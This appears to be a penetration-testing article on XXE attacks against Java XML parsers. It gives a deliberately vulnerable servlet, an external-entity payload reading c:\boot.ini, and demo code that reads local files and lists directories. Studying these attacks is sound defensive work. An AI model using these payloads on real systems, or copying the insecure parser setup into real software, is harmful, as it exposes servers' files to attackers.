Attacking Server Side XML Parsers
By Kingcope
Preface
During a web application audit, one might come across an application that handles XML files. For example, an application may allow users to upload XML files whose contents are inserted into a database and later displayed on the front end. I came across a significant vulnerability class that allows an attacker (or penetration tester) to read any file on the underlying file system that is accessible to the user the application server runs as. If the application is written in Java, this includes directory listings as well.
The source code of the vulnerable application, which is used later to disclose files and directories, is shown below. It looks unsuspicious from a developer's point of view.
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class VulnerableServlet extends HttpServlet {

    public void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        // Delegate the work to doPost()
        doPost(request, response);
    }

    public void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        try {
            response.setContentType("text/html");
            PrintWriter out = response.getWriter();
            if (request.getParameter("xmldata") == null) {
                // No XML submitted yet: show the input form
                out.println("<form method=\"post\" action=\"VulnerableServlet\"><textarea name=\"xmldata\" cols=75 rows=25>Input XML data here.</textarea><input type=\"submit\" value=\"Submit\"/></form>");
            } else {
                // Parse the user-supplied XML with the default parser settings
                StringReader reader = new StringReader(request.getParameter("xmldata"));
                InputSource inputSource = new InputSource(reader);
                DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
                DocumentBuilder db = dbf.newDocumentBuilder();
                Document doc = db.parse(inputSource);
                reader.close();
                doc.getDocumentElement().normalize();
                out.println("Root element " + doc.getDocumentElement().getNodeName() + "<br>");
                NodeList nodeLst = doc.getElementsByTagName("employee");
                out.println("Information of all employees" + "<br>");
                for (int s = 0; s < nodeLst.getLength(); s++) {
                    Node fstNode = nodeLst.item(s);
                    if (fstNode.getNodeType() == Node.ELEMENT_NODE) {
                        Element fstElmnt = (Element) fstNode;
                        // Echo the first name back to the user
                        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName("firstname");
                        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);
                        NodeList fstNm = fstNmElmnt.getChildNodes();
                        out.println("First Name : " + ((Node) fstNm.item(0)).getNodeValue() + "<br>");
                        // Echo the last name back to the user
                        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName("lastname");
                        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);
                        NodeList lstNm = lstNmElmnt.getChildNodes();
                        out.println("Last Name : " + ((Node) lstNm.item(0)).getNodeValue() + "<br>");
                    }
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
The servlet receives the request parameter xmldata from the form shown in Figure 1 and parses it using the parse() method of the javax.xml.parsers.DocumentBuilder class. Now let's feed some XML to the servlet and see what the output displays. The XML to be parsed is the following employee list:
Figure 2: The form is filled with XML data
When the data is parsed, the user is presented with the following human-readable text:
Figure 3: The output of the servlet after submitting the XML file
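The parsing step can also be tried outside a servlet container. The following is a minimal sketch, not the author's test data: the class name EmployeeListDemo, the root element name employees, and the three employee names are assumptions made for illustration. Only the element names employee, firstname and lastname come from the servlet source.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class EmployeeListDemo {
    // Hypothetical sample data; the names and the root element are invented.
    static final String SAMPLE_XML =
        "<?xml version=\"1.0\"?>"
        + "<employees>"
        + "<employee><firstname>Alice</firstname><lastname>Smith</lastname></employee>"
        + "<employee><firstname>Bob</firstname><lastname>Jones</lastname></employee>"
        + "<employee><firstname>Carol</firstname><lastname>Miller</lastname></employee>"
        + "</employees>";

    // Mirrors the servlet's logic, but returns the lines instead of writing HTML.
    static List<String> render(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();
        Document doc = db.parse(new InputSource(new StringReader(xml)));
        doc.getDocumentElement().normalize();

        List<String> lines = new ArrayList<>();
        lines.add("Root element " + doc.getDocumentElement().getNodeName());
        lines.add("Information of all employees");
        NodeList employees = doc.getElementsByTagName("employee");
        for (int i = 0; i < employees.getLength(); i++) {
            Element employee = (Element) employees.item(i);
            lines.add("First Name : "
                + employee.getElementsByTagName("firstname").item(0).getTextContent());
            lines.add("Last Name : "
                + employee.getElementsByTagName("lastname").item(0).getTextContent());
        }
        return lines;
    }

    public static void main(String[] args) throws Exception {
        render(SAMPLE_XML).forEach(System.out::println);
    }
}
```

The sketch uses getTextContent() instead of the servlet's getChildNodes().item(0).getNodeValue(); for simple text-only elements both yield the same string.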
Let's consider the following DOCTYPE declaration:
<?xml version="1.0"?>
<!DOCTYPE rootelement [
<!ELEMENT rootelement (#PCDATA)>
]>
<rootelement>Hello Jupiter!</rootelement>
As you can see, the document type declaration, placed directly after the XML declaration, describes the structure of the actual XML data. In this case it declares what content the root element may hold. We then add another declaration to the DOCTYPE, and this one is special: an external entity declaration that references a local file on the system (and, as we will see later, can also reference directories):
<?xml version="1.0"?>
<!DOCTYPE rootelement [
<!ELEMENT rootelement (#PCDATA)>
<!ENTITY c SYSTEM "file:///c:/boot.ini">
]>
<rootelement>&c;</rootelement>
In the above construct, the entity c in the XML data will be replaced by the contents of the file c:\boot.ini, meaning that the rootelement element will contain the contents of c:\boot.ini after being parsed by the servlet. So the main task for a penetration tester is to rewrite the DOCTYPE so that it conforms to the XML elements it describes. Once the penetration tester has written a DOCTYPE declaration that the servlet parses without error, he just has to place the entity reference &c; in an element whose content is later displayed on the screen. In our XML example the entity reference is placed in the firstname or lastname element, as both are shown to the user. Let us see what happens when we input the correct DOCTYPE and click on submit.
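The substitution described above can be reproduced locally with a small sketch. It assumes a JDK whose default JAXP settings still resolve external entities, and it uses a temporary file as a stand-in for c:\boot.ini so that it runs on any platform. The class name XxeFileDemo, the root element employees, and the employee names are hypothetical.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class XxeFileDemo {
    // Builds an employee list whose DOCTYPE declares the external entity c
    // and whose third firstname element references it. Names are invented.
    static String buildPayload(String systemId) {
        return "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE employees [\n"
            + "<!ELEMENT employees ANY>\n"
            + "<!ENTITY c SYSTEM \"" + systemId + "\">\n"
            + "]>\n"
            + "<employees>"
            + "<employee><firstname>Alice</firstname><lastname>Smith</lastname></employee>"
            + "<employee><firstname>Bob</firstname><lastname>Jones</lastname></employee>"
            + "<employee><firstname>&c;</firstname><lastname>Miller</lastname></employee>"
            + "</employees>";
    }

    // Parses with default factory settings, as the vulnerable servlet does,
    // and returns the text of every firstname element.
    static List<String> firstNames(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        NodeList nodes = doc.getElementsByTagName("firstname");
        List<String> names = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            names.add(nodes.item(i).getTextContent());
        }
        return names;
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for the local file an attacker wants to read.
        Path target = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(target, "contents of a local file".getBytes(StandardCharsets.UTF_8));
            String payload = buildPayload(target.toUri().toString());
            System.out.println(firstNames(payload));
        } finally {
            Files.deleteIfExists(target);
        }
    }
}
```

Because the parser is non-validating, the ELEMENT declaration is not enforced; it is kept only to mirror the shape of the DOCTYPE shown earlier. Note that the referenced file must itself be parseable as XML text content, so files containing a bare < or & are likely to cause a parse error instead of being disclosed.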
As the above XML file illustrates, the DOCTYPE is adjusted to the XML data; in this case only the root element name has to be adjusted and the external entity referencing the local file has to be added. The third employee's first name is now replaced by the external entity reference, and as the following figure illustrates, the attack succeeds:
Figure 4: The third First Name now includes the contents of the requested file.
Java does not distinguish between requested files and requested folders when parsing external entities, therefore the whole file system can be traversed.
Figure 5: When requesting the directory file://c:/ the whole directory structure is displayed by the vulnerable servlet.
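The directory behaviour can be checked with a similar sketch. It assumes the JDK's built-in file: URL handler, which returns a listing of entry names when the URL points at a directory, and a JDK whose default JAXP settings resolve external entities. The class name XxeDirectoryDemo, the temporary directory, and the file name notes.txt are hypothetical.

```java
import java.io.StringReader;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class XxeDirectoryDemo {
    // Resolves an external entity pointing at systemId and returns the
    // text that ends up inside the root element.
    static String resolve(String systemId) throws Exception {
        String xml = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE rootelement [\n"
            + "<!ELEMENT rootelement (#PCDATA)>\n"
            + "<!ENTITY c SYSTEM \"" + systemId + "\">\n"
            + "]>\n"
            + "<rootelement>&c;</rootelement>";
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // A throwaway directory with one entry, standing in for c:/.
        Path dir = Files.createTempDirectory("xxe-dir-demo");
        Path entry = Files.createFile(dir.resolve("notes.txt"));
        try {
            // The entity points at the directory itself, not at a file.
            System.out.println(resolve(dir.toUri().toString()));
        } finally {
            Files.deleteIfExists(entry);
            Files.deleteIfExists(dir);
        }
    }
}
```

Each name in the listing can then be appended to the directory URL in a follow-up request, which is how the file system can be walked step by step.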
Conclusion
As we have seen, it is rather easy to trick the XML parser of a web application into disclosing files remotely. All the attacker has to do is create an appropriate XML document. The attack is known as the XXE (XML eXternal Entity) attack. Its scope is often underestimated, since it applies to web applications as well.